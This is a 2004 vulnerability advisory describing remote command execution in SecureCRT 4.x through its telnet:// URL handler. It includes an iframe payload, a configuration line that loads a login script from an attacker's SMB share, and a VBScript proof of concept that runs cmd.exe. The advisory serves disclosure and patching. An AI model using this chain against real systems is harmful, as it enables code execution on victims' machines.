SecureCRT - Remote Command Execution
========================================================================
= SecureCRT - Remote Command Execution
=
= Vendor Update:
= http://www.vandyke.com/download/securecrt/index.html
=
= Affected Software:
= SecureCRT V4.1, V4.0 (and probably lower)
=
= Public disclosure on November 23, 2004
========================================================================
== Overview ==
In this time of responsible vulnerability disclosure, it's a little
disturbing when a vendor acts on disclosed information but gives no
recognition or even notification that an update has been created due to
the information passed to them.
This advisory is a little late, the update was posted to the vendor
website last month. The only reason I know this, is because I asked and
received a response.
------------------------------------------------------------------------
Brett,
SecureCRT version 4.1.9 was released on Oct. 26, and is
available for public download at the following location:
http://www.vandyke.com/download/securecrt/index.html
My apologies for not sending a special notice to you upon
release. It was something that slipped off my radar.
If you have any questions, please let us know.
Thanks,
Jake Devenport
------------------------------------------------------------------------
But enough of that, we know the game and still choose to play.
SecureCRT installs a URL PROTOCOL handler into the registry, as
"C:\Program Files\SecureCRT\SecureCRT.EXE" %1
This allows a user to click on a telnet:// link and have it opened from
within their web browser.
This 'telnet execution' can be automated through an html page such as
<iframe src="telnet://192.168.0.1:25">
SecureCRT will accept a command line option (/F) to specify the directory
to use as the configuration folder. It is possible by crafting a special
URL to specify this directory through the html page. An attacker can
specify a directory accessible through unprotected SMB share, therefore
allowing them to control the configuration of secureCRT.
SecureCRT allows for 'scripting' using script languages such as vbscript
and has the ability to create a logon script. An attacker can therefore
create a script to execute commands and have these commands executed on
the targets computer.
== Exploitation ==
There appears to be some filtering around the use of \ in the url->command
line parsing, that appeared to prevent the specification of an SMB share
to use for the configuration. This can be easily bypassed and leads to the
loading of a configuration file from a remote site.
The configuration file contains an entry that specifies the login script
to run which can be set a file on the the remote share;
S:"Script Filename"=\\ipofshare\share\folder\scriptname
And the login script can then contain scripting such as;
# $language = "VBScript"
# $interface = "1.0"
Sub Main
dim wshShell, boolErr, strErrDesc
Set wshShell = CreateObject("WScript.Shell")
run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
End Sub
== Solutions ==
- Install the vendor supplied patch.
== Credit ==
Discovered and advised to vandyke.com August 24, 2004 by Brett Moore of
Security-Assessment.com
== About Security-Assessment.com ==
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.
######################################################################
CONFIDENTIALITY NOTICE:
This message and any attachment(s) are confidential and proprietary.
They may also be privileged or otherwise protected from disclosure. If
you are not the intended recipient, advise the sender and delete this
message and any attachment from your system. If you are not the
intended recipient, you are not authorised to use or copy this message
or attachment or disclose the contents to any other person. Views
expressed are not necessarily endorsed by Security-Assessment.com
Limited. Please note that this communication does not designate an
information system for the purposes of the New Zealand Electronic
Transactions Act 2003.
######################################################################